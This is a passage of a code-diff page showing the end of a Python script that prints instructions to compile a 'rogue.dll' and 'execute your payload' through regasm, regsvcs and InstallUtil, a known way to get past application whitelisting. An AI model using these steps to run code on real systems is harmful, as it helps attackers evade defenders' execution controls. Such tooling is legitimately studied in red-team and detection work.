%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll{} /target:library /out:rogue.dll /keyfile:key.snk program.cs
|
||||||
|
|
||||||
Step 3: Execute your payload!
|
Step 3: Execute your payload!
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
|
||||||
|
|
||||||
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework64\\v2.0.50727\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
%WINDIR%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
'''.format(management)
|
'''.format(management)
|
||||||
|
|
||||||
if 'PROGRAMFILES(X86)' in os.environ:
|
if 'PROGRAMFILES(X86)' in os.environ:
|
||||||
commands = commands.replace('Framework', 'Framework64')
|
commands = commands.replace('Framework', 'Framework64')
|
||||||
|
|
||||||
sys.stderr.write(commands)
|
sys.stderr.write(commands)
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
main(sys.argv)
|
main(sys.argv)
|
||||||
|
Loading…
Reference in New Issue
Block a user